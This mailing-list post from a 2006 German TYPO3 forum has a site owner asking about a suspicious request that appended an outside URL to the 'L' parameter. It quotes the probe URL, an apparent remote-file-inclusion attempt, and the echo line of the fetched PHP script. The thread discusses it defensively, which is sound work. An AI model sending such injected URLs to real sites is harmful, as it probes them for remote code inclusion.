[TYPO3-german] Warnung !!! - Komische Anfrage an mein Typo3
Christian Leicht
usenet at schani.com
Tue Sep 5 11:21:42 CEST 2006
Martin Holtz schrieb:
> Hi,
>
>> Gerade habe ich bemerkt das beim aufrufen meiner Domain und nach
>> anklicken einiger Links - automatisch an die L Variable
>> "index.php?id=34&L=http://abuser.republika.pl/test" angehängt wird.
> Warum hat das denn überhaupt eine Auswirkung?
>
>> > index.php?id=34&L=http://abuser.republika.pl/test
>> >
>> > Versucht da jemand meine Seite zu knacken? Wenn ich dem Link nachgehe
>> kommt dieses php Script zum Vorschein:
> wie kommt das denn da hin?
> Woher? Ist das eine Lücke in TYPO3?
>
> Und wenn ja, dann bitte erst ans Security-Team melden.
>
>> > <?
>> >
>> > echo 'm4k4bra - mamy cie';
> Ein Php-Skript das weitere Skripte nachladen möchte...?
>
> beunruhigend. Gut wäre es, wenn du den Ort des Einbruchs nachverfolgen
> könntest. Sollte doch über die Logfiles gehen (IP suchen?).
>
> Die Wahrscheinlichkeit ist doch gegeben, dass du nicht als einziger dieses
> Problem hast....
>
> gruß,
> martin
Da sich noch keiner so wie Du geäußert hat, denke ich es kommt bei
anderen nicht vor.
In den Logdateien wurde nur einmal von der republika.pl auf mein Typo3
zugegriffen und kurz danach hatte ich an jedem Link das Anhängsel dran.
Nachdem ich aber den Apache neu gestartet hatte und die Domain gesperrt
hatte war der Spuk wieder weg.
Christian
More information about the TYPO3-german
mailing list